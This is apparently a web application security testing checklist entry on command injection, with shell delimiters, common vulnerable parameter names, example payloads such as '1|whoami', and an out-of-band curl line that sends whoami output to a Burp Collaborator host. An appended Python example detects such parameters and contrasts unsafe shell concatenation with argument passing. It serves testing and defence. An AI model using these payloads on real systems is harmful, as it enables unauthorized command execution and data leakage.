V5 - Validation/Sanitization
Command Injection
POC
We can inject some special characters to see whether the application blocks anything that could be used for command injection:
- &
- ;
- Newline (0x0a or \n)
- &&
- |
- ||
If the application doesn't throw any error messages, we can try injecting our command after one of these delimiters.
https://vulnerable-website/endpoint?parameter=1|whoami
Observe whether the parameter passes the injected command to a shell, for example through an out-of-band request: http://targetsite?id=blahblah;curl+$(whoami).xxxxx.burpcollaborator.net/
Note: This is a broad concept; the payload above is just an example.
The most common parameters that can be considered while testing for command injection are listed below:
- cmd
- exec
- command
- execute
- ping
- query
- jump
- code
- reg
- do
- func
- arg
- option
- load
- process
- step
- read
- function
- req
- feature
- exe
- module
- payload
- run
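The following is an added example (not part of the original checklist) that turns the delimiter list and parameter list above into review and detection logic: it flags request URLs whose parameters carry the listed shell delimiters, shows the string-concatenation pattern that makes the POC work, and contrasts it with passing input as a single argv element so the delimiters arrive as literal text. Hostnames, URLs and parameter names in the sample input are constructed.

```python
import re
import subprocess
import sys
from urllib.parse import parse_qs, urlsplit

# Delimiters from the checklist; "&&" and "||" are caught by "&" and "|".
SHELL_METACHARS = re.compile(r"[&;|\n\r]")

# Parameter names the checklist lists as common command-injection sinks.
WATCHED_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
    "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
    "function", "req", "feature", "exe", "module", "payload", "run",
}

def flag_request(url: str) -> list[tuple[str, str, str]]:
    """Return (param, decoded value, priority) for every parameter containing a delimiter.
    Priority is 'high' when the name is on the checklist, 'medium' otherwise."""
    hits = []
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in qs.items():
        for value in values:
            if SHELL_METACHARS.search(value):
                priority = "high" if name.lower() in WATCHED_PARAMS else "medium"
                hits.append((name, value, priority))
    return hits

def vulnerable_command_line(host: str) -> str:
    """The pattern behind the POC: untrusted input concatenated into a shell string.
    A shell splits on | ; & and runs whatever follows as a second command."""
    return f"ping -c 1 {host}"

def safe_echo_argument(value: str) -> str:
    """Hardened pattern: length-check, then pass input as one argv element with no shell.
    The child process receives delimiters as plain characters, not as syntax."""
    if len(value) > 253:
        raise ValueError("rejected: parameter too long")
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout

if __name__ == "__main__":
    # Constructed sample access-log URLs; '&' and ';' are percent-encoded so they reach the app as data.
    for line in ["https://app.example/endpoint?parameter=1|whoami",
                 "https://app.example/run?cmd=ls%26%26id&user=alice",
                 "https://app.example/search?query=hello+world"]:
        print(line, "->", flag_request(line))
    print(vulnerable_command_line("1|whoami"), "|", repr(safe_echo_argument("1|whoami")))
```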
Impact
High
Likelihood
High